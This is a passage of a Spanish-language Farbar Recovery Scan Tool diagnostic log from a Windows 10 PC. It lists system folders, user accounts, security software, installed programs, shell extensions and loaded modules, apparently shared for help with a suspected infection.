2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\ShellComponents
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\Provisioning
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\DiagTrack
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\bcastdvr
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Program Files\Windows Defender
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\Program Files\Common Files\System
2020-08-18 00:37 - 2019-03-19 01:52 - 000000000 ____D C:\PerfLogs
2020-08-18 00:37 - 2019-03-19 01:37 - 000000000 ____D C:\Windows\servicing
2020-08-17 21:35 - 2019-03-19 08:52 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\OEMDefaultAssociations.dll
2020-08-17 21:35 - 2019-03-19 08:52 - 000018903 _____ C:\Windows\system32\OEMDefaultAssociations.xml
2020-08-17 21:10 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\LiveKernelReports
2020-08-17 08:30 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\appcompat
2020-08-16 21:30 - 2019-03-19 01:49 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2020-08-16 20:34 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\spool
2020-08-16 20:34 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\FxsTmp
2020-08-16 20:32 - 2019-03-19 01:52 - 000000000 ____D C:\Program Files\Windows NT
2020-08-16 20:20 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\system32\WinBioDatabase
2020-08-16 18:54 - 2019-03-19 01:52 - 000000000 ____D C:\Windows\ServiceState
2020-08-16 18:37 - 2019-03-19 01:52 - 000000000 ____D C:\ProgramData\USOPrivate
==================== Archivos en la raíz de algunos directorios ========
2020-08-23 20:50 - 2020-08-23 21:11 - 000000004 _____ () C:\ProgramData\lock.dat
2020-08-23 20:52 - 2020-08-23 21:11 - 000000004 _____ () C:\ProgramData\rc.dat
2020-08-23 20:50 - 2020-08-23 20:50 - 000000008 _____ () C:\ProgramData\ts.dat
2020-08-26 15:17 - 2020-08-26 15:17 - 000000776 _____ () C:\Users\Hetitor\AppData\Roaming\it.omnidea.Rulers.plist
2020-08-23 20:36 - 2020-08-23 20:36 - 000000560 _____ () C:\Users\Hetitor\AppData\Local\bowsakkdestx.txt
==================== SigCheck ============================
(No existe una corrección automática para los archivos que no pasan la verificación.)
==================== Final de FRST.txt ========================
Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 29-08-2020
Ejecutado por Hetitor (02-09-2020 09:18:57)
Ejecutado desde C:\Users\Hetitor\Downloads\Programs
Windows 10 Pro Versión 1903 18362.1016 (X64) (2020-08-16 23:32:16)
Modo de Inicio: Normal
==========================================================
==================== Cuentas: =============================
Administrador (S-1-5-21-1406036411-3523515736-3522702373-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1406036411-3523515736-3522702373-503 - Limited - Disabled)
Hetitor (S-1-5-21-1406036411-3523515736-3522702373-1001 - Administrator - Enabled) => C:\Users\Hetitor
hldf (S-1-5-21-1406036411-3523515736-3522702373-1002 - Limited - Disabled)
Invitado (S-1-5-21-1406036411-3523515736-3522702373-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-1406036411-3523515736-3522702373-504 - Limited - Disabled)
==================== Centro de Seguridad ========================
(Si una entrada es incluida en el fixlist, será eliminada.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
==================== Programas instalados ======================
(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 20.7.2 - Advanced Micro Devices, Inc.)
Angry Birds Rio (HKLM-x32\...\{137EA7E1-D30B-4373-B8B6-CB7E85107F6D}) (Version: 1.2.2 - Rovio)
AOMEI Partition Assistant 8.9 (HKLM-x32\...\{04F850ED-FD0F-4ED1-AE1B-4498165BF3D2}_is1) (Version: - AOMEI International Network Limited.)
aTube Catcher versión 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Big Kahuna Reef 2 - Chain Reaction (HKLM-x32\...\BFG-Big Kahuna Reef 2 - Chain Reaction) (Version: - )
Brain Trainer 3 (HKLM-x32\...\{7B6F2F56-CDF4-4ACB-95A2-DBB21E529CE9}) (Version: 1.0 - Mindscape)
Branding64 (HKLM\...\{856DA29A-EA4A-468B-BBC2-B5F60DD75BFE}) (Version: 1.00.0002 - Advanced Micro Devices, Inc.) Hidden
Corel Graphics - Windows Shell Extension (HKLM\...\_{4F36AC9B-954C-4C49-8573-D2A9EF8079B4}) (Version: 22.0.0.411 - Corel Corporation)
Corel Graphics - Windows Shell Extension (HKLM\...\{4F36AC9B-954C-4C49-8573-D2A9EF8079B4}) (Version: 22.0.411 - Corel Corporation) Hidden
Corel Graphics - Windows Shell Extension 32 Bit Keys (HKLM\...\{C28C908E-0E70-470C-B556-DFDDE9973766}) (Version: 22.0.411 - Corel Corporation) Hidden
Corel Update Manager (HKLM\...\{F30F96B6-EADE-44FF-B202-C8697BC088F8}) (Version: 2.13.594 - Corel corporation) Hidden
CorelDRAW Graphics Suite 2020 - BR (x64) (HKLM\...\{81EF9588-5855-4969-AC13-313B481DF509}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Capture (x64) (HKLM\...\{74ADEA1C-2599-4B37-9914-6DEAF1ED8E8A}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Common (x64) (HKLM\...\{DBF9D76B-1258-47F0-B098-3530B2260BA8}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Connect (x64) (HKLM\...\{5F24AC64-1C0C-496F-AD5E-A13D79E1EC2F}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Custom Data (x64) (HKLM\...\{257D40A3-02FA-4B0F-9EE9-4D225DEF836D}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - DE (x64) (HKLM\...\{C5A2ECAC-CB7C-4127-821A-22E1032C549B}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Discovery (x64) (HKLM\...\{0A8A5710-1769-42C8-ACB6-5B6F5F369FE0}) (Version: 22.0.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Draw (x64) (HKLM\...\{0D490D76-C278-41A8-B586-EC9E668A95DA}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - EN (x64) (HKLM\...\{7A2135E5-52F9-4345-8785-EF5AC824CD8A}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - ES (x64) (HKLM\...\{DE56C300-8B33-46CC-A802-6F996ADF8C14}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Filters (x64) (HKLM\...\{AED0D86F-111D-44F2-B398-346F6209D7BC}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Font Manager (x64) (HKLM\...\{EAC3C1F2-2621-41F7-A3EC-749ADD074F43}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - FR (x64) (HKLM\...\{BADD6476-77B7-402F-A894-F96C05923E8C}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM (x64) (HKLM\...\{0E0F6EBF-E2BA-4B1A-ADEC-CAF4612B2AC7}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM Content BR (x64) (HKLM\...\{AE21B6DA-78D3-4772-81EF-9A0163BDB0C6}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM Content DE (x64) (HKLM\...\{9A7ABF9B-1CF1-452F-B6A9-1FD425AD12D9}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM Content EN (x64) (HKLM\...\{C796DB48-473A-4F12-998D-0D690570D633}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM Content ES (x64) (HKLM\...\{38B83748-7D9B-48DB-94EE-004D49E84BD3}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM Content FR (x64) (HKLM\...\{E2E7B6E9-3A6F-4421-8D1F-24ED7647B00A}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM Content IT (x64) (HKLM\...\{EEC60482-484C-4B29-BB56-0C04F086B372}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IPM Content NL (x64) (HKLM\...\{0A404310-BE95-47B5-BE1C-5C664490EE17}) (Version: 22.0 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - IT (x64) (HKLM\...\{8D234D28-8A86-4156-9601-F506D6C8D6A1}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Models (x64) (HKLM\...\{EB7FD97D-E7D4-4C0A-A867-8296304E3E77}) (Version: 22.0.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - NL (x64) (HKLM\...\{6CDA36C5-B774-429D-881E-49FF1C198FCD}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - PHOTO-PAINT (x64) (HKLM\...\{0FFD26AB-D457-4002-A91E-416973A46313}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Setup Files (x64) (HKLM\...\{7FA269F4-59E4-4399-A239-E9A134D40BED}) (Version: 22.2 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - VBA (x64) (HKLM\...\{7C1FEC96-B556-4609-A426-40CDF2D13730}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Workspaces (x64) (HKLM\...\{04329D14-C52B-4545-A12F-39FBF6A556C5}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 - Writing Tools (x64) (HKLM\...\{F404C086-454C-4485-B5F1-F3C11B8DF452}) (Version: 22.1 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 2020 (64-Bit) (HKLM\...\_{7FA269F4-59E4-4399-A239-E9A134D40BED}) (Version: 22.1.1.523 - Corel Corporation)
CorelDRAW Graphics Suite 2020 (HKLM\...\{C601467E-87E0-4BD0-ACA7-7AC34E9F0716}) (Version: 22.2 - Corel Corporation) Hidden
Ditto (HKLM-x32\...\Ditto_is1) (Version: - Scott Brogden)
Download Studio (HKLM-x32\...\{636FDC4D-DDA7-48CA-AEFF-D3CC57A43A7E}_is1) (Version: 1.11.1.4 - Grand Media LLC)
FormatFactory 5.4.0.0 (HKLM-x32\...\FormatFactory) (Version: 5.4.0.0 - Free Time)
FxSound Enhancer (HKLM-x32\...\DFX) (Version: 13.027 - FxSound)
Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\_{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation)
Ghostscript GPL 8.64 (Msi Setup) (HKLM-x32\...\{06CD45E6-FF5E-4D8E-BC01-B276A90DADF2}) (Version: 8.64 - Corel Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 84.0.4147.135 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
IBM Lotus Organizer 6 - English (HKLM-x32\...\{4F726761-6E69-7A65-7236-2E31302D0409}) (Version: 6.1 - IBM & Lotus Development Corporation)
IconPackager (HKLM-x32\...\IconPackager) (Version: 5.10 - Stardock Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: 6.38.2 - Tonec Inc.)
K-Lite Codec Pack 15.6.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 15.6.5 - KLCP)
LAV Filters 0.74.1 (HKLM-x32\...\lavfilters_is1) (Version: 0.74.1 - Hendrik Leppkes)
Malwarebytes version 4.2.0.82 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.0.82 - Malwarebytes)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.44 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office Profesional Plus 2019 - es-es (HKLM\...\ProPlus2019Retail - es-es) (Version: 16.0.13029.20344 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\OneDriveSetup.exe) (Version: 20.134.0705.0008 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{406C9ADB-1325-4FD0-9D13-C119CFF64E0A}) (Version: 2.65.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 (HKLM-x32\...\{6913e92a-b64e-41c9-a5e6-cef39207fe89}) (Version: 14.25.28508.3 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual Studio Tools for Applications 2019 (HKLM-x32\...\{1edcd8d2-905a-4e93-bfdf-92ed5601528a}) (Version: 16.0.28801 - Microsoft Corporation)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 78.1.1 - Mozilla)
Mozilla Thunderbird 78.1.1 (x86 es-ES) (HKLM-x32\...\Mozilla Thunderbird 78.1.1 (x86 es-ES)) (Version: 78.1.1 - Mozilla)
Mozilla Thunderbird 78.2.1 (x86 es-ES) (HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\Mozilla Thunderbird 78.2.1 (x86 es-ES)) (Version: 78.2.1 - Mozilla)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.13029.20200 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.13029.20236 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0C0A-1000-0000000FF1CE}) (Version: 16.0.13029.20200 - Microsoft Corporation) Hidden
Opera Stable 70.0.3728.144 (HKU\S-1-5-21-1406036411-3523515736-3522702373-1001\...\Opera 70.0.3728.144) (Version: 70.0.3728.144 - Opera Software)
Organizer Conversion Utility (HKLM-x32\...\Organizer Conversion Utility) (Version: - )
PowerDesk 8.5 (HKLM-x32\...\{D5A1D99C-B812-4B61-9AF4-DF9AA4982494}) (Version: 8.5.0.0 - Avanquest North America Inc.)
RS Somnífero (HKLM-x32\...\RS Somnífero) (Version: 2.7.2005.4163 - Rico Software)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.11 - VideoLAN)
WinRAR 5.90 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.90.0 - win.rar GmbH)
Wondershare Helper Compact 2.5.3 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.5.3 - Wondershare)
Wondershare Recoverit(Build 9.0.1.11) (HKLM-x32\...\{829555DC-31E5-4FEA-B350-8FCF24CECD95}_is1) (Version: 9.0.1.11 - Wondershare Software Co.,Ltd.)
Packages:
=========
Complemento de motor multimedia para Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-08-17] (Microsoft Corporation)
IDM Integration Module -> C:\Program Files\WindowsApps\TonecInc.IDMIntegrationModule_6.38.2.0_neutral__e7b5mm5d3r6v2 [2020-08-16] (Tonec FZE)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2020-08-16] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2020-08-16] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-21] (Microsoft Studios) [MS Ad]
MSN El tiempo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.36.20714.0_x64__8wekyb3d8bbwe [2020-08-16] (Microsoft Corporation) [MS Ad]
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.14.222.0_x64__dt26b99r8h8gj [2020-08-16] (Realtek Semiconductor Corp)
Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.140.508.0_x86__zpdnekdrzrea0 [2020-08-21] (Spotify AB) [Startup Task]
==================== Personalizado CLSID (Lista blanca): ==============
(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)
SSODL-x32: IconPackager Repair - {1799460C-0BC8-4865-B9DF-4A36CD703FF0} - Ningún archivo
ShellIconOverlayIdentifiers: [ IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2019-05-02] (Tonec Inc. -> Tonec Inc.)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Ningún archivo
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Ningún archivo
ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Ningún archivo
ContextMenuHandlers1: [FormatFactoryShell] -> {A3888923-CFD3-4A6B-89BF-08E6B95716E8} => C:\Utilitarios\FormatFactory\ShellEx_108.dll [2020-08-04] (Free Time) [Archivo no firmado]
ContextMenuHandlers1-x32: [PowerDesk Menu] -> {26E7F081-EB97-11d3-9239-006008D2D00F} => H:\Utilitarios\PD8\PDShExt.dll [2010-09-30] (Avanquest Publishing USA, Inc.) [Archivo no firmado]
ContextMenuHandlers1: [PowerDesk64 Menu] -> {E682004E-DA1E-4b71-8A42-A540AD61BDC0} => H:\Utilitarios\PD8\PDShExt64.dll [2010-09-30] (Avanquest Publishing USA, Inc.) [Archivo no firmado]
ContextMenuHandlers1: [SmartGameBoosterMenu] -> {96C86AD1-055D-457D-9C00-0D4A91ECF1B4} => E:\Program Files (x86)\PCGameBoost\Smart Game Booster\4.5.0\MenuExt64.dll [2020-05-29] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => H:\Utilitarios\WinRAR\rarext.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => H:\Utilitarios\WinRAR\rarext32.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [PowerDesk64 Menu] -> {E682004E-DA1E-4b71-8A42-A540AD61BDC0} => H:\Utilitarios\PD8\PDShExt64.dll [2010-09-30] (Avanquest Publishing USA, Inc.) [Archivo no firmado]
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-08-24] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers3: [SmartGameBoosterMenu] -> {96C86AD1-055D-457D-9C00-0D4A91ECF1B4} => E:\Program Files (x86)\PCGameBoost\Smart Game Booster\4.5.0\MenuExt64.dll [2020-05-29] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Ningún archivo
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Ningún archivo
ContextMenuHandlers4: [FormatFactoryShell] -> {A3888923-CFD3-4A6B-89BF-08E6B95716E8} => C:\Utilitarios\FormatFactory\ShellEx_108.dll [2020-08-04] (Free Time) [Archivo no firmado]
ContextMenuHandlers4-x32: [PowerDesk Menu] -> {26E7F081-EB97-11d3-9239-006008D2D00F} => H:\Utilitarios\PD8\PDShExt.dll [2010-09-30] (Avanquest Publishing USA, Inc.) [Archivo no firmado]
ContextMenuHandlers4: [PowerDesk64 Menu] -> {E682004E-DA1E-4b71-8A42-A540AD61BDC0} => H:\Utilitarios\PD8\PDShExt64.dll [2010-09-30] (Avanquest Publishing USA, Inc.) [Archivo no firmado]
ContextMenuHandlers4: [SmartGameBoosterMenu] -> {96C86AD1-055D-457D-9C00-0D4A91ECF1B4} => E:\Program Files (x86)\PCGameBoost\Smart Game Booster\4.5.0\MenuExt64.dll [2020-05-29] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2020-07-11] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Ningún archivo
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2020-08-24] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [SmartGameBoosterMenu] -> {96C86AD1-055D-457D-9C00-0D4A91ECF1B4} => E:\Program Files (x86)\PCGameBoost\Smart Game Booster\4.5.0\MenuExt64.dll [2020-05-29] (Chengdu Zhagu Technology Co., Ltd. -> Smart Game Booster)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => H:\Utilitarios\WinRAR\rarext.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => H:\Utilitarios\WinRAR\rarext32.dll [2020-03-26] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Lista blanca) ====================
(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)
HKLM\...\Drivers32: [VIDC.FMVC] => C:\Windows\SysWOW64\fmcodec.dll [77824 2008-08-18] (Fox Magic Software) [Archivo no firmado]
==================== Accesos directos & WMI ========================
==================== Módulos cargados (Lista blanca) =============
2020-06-11 12:56 - 2020-06-11 12:56 - 000017920 _____ () [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\libEGL.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 003567616 _____ () [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2015-10-10 19:08 - 2007-09-02 13:57 - 000069632 _____ () [Archivo no firmado] H:\HECTOR\RocketDock\RocketDock.dll
2020-07-11 17:34 - 2020-07-11 17:34 - 001583104 _____ (Advanced Micro Devices, Inc.) [Archivo no firmado] C:\Program Files\AMD\WVR\OpenVR\bin\win64\driver_amdwvr.dll
2010-09-30 15:01 - 2010-09-30 15:01 - 000420352 _____ (Avanquest Publishing USA, Inc.) [Archivo no firmado] H:\Utilitarios\PD8\PDShExt64.dll
2012-02-24 11:25 - 2012-02-24 11:25 - 000144384 _____ (Avanquest Software) [Archivo no firmado] H:\Utilitarios\PD8\MXPM64.DLL
2020-08-18 10:39 - 2017-09-05 12:11 - 000042496 _____ (Ditto Utility Addin) [Archivo no firmado] C:\Program Files (x86)\Ditto\Addins\DittoUtil.dll
2020-08-04 06:46 - 2020-08-04 06:46 - 000341504 _____ (Free Time) [Archivo no firmado] C:\Utilitarios\FormatFactory\ShellEx_108.dll
2010-09-30 14:38 - 2010-09-30 14:38 - 000965120 _____ (STLport Consulting, Inc.) [Archivo no firmado] H:\Utilitarios\PD8\stlport64.5.2.dll
2020-08-18 10:39 - 2017-09-05 12:07 - 026215936 _____ (The ICU Project) [Archivo no firmado] C:\Program Files (x86)\Ditto\icudt58.dll
2020-08-18 10:39 - 2017-09-05 12:07 - 001817600 _____ (The ICU Project) [Archivo no firmado] C:\Program Files (x86)\Ditto\icuin58.dll
2020-08-18 10:39 - 2017-09-05 12:07 - 001251840 _____ (The ICU Project) [Archivo no firmado] C:\Program Files (x86)\Ditto\icuuc58.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000031744 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qgif.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000039424 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qicns.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000031744 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qico.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000413696 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qjpeg.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000025088 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qsvg.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000025088 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qtga.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000023552 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwbmp.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000519168 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\imageformats\qwebp.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 001431040 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\platforms\qwindows.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 001180672 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\sqldrivers\qsqlite.dll
2020-06-11 12:57 - 2020-06-11 12:57 - 000135680 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\plugins\styles\qwindowsvistastyle.dll
2020-07-11 17:41 - 2020-07-11 17:41 - 006010880 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Core.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 006345216 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Gui.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 001078272 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Network.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000313856 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Positioning.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 004000256 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Qml.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 003802624 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Quick.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000171008 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5QuickControls2.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 001083904 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5QuickTemplates2.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000205312 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Sql.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000329728 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5Svg.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000113152 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WebChannel.dll
2020-06-11 12:56 - 2020-06-11 12:56 - 000376320 _____ (The Qt Company Ltd.) [Archivo no firmado] C:\Program Files\AMD\CNext\CNext\Qt5WebEngine.dll
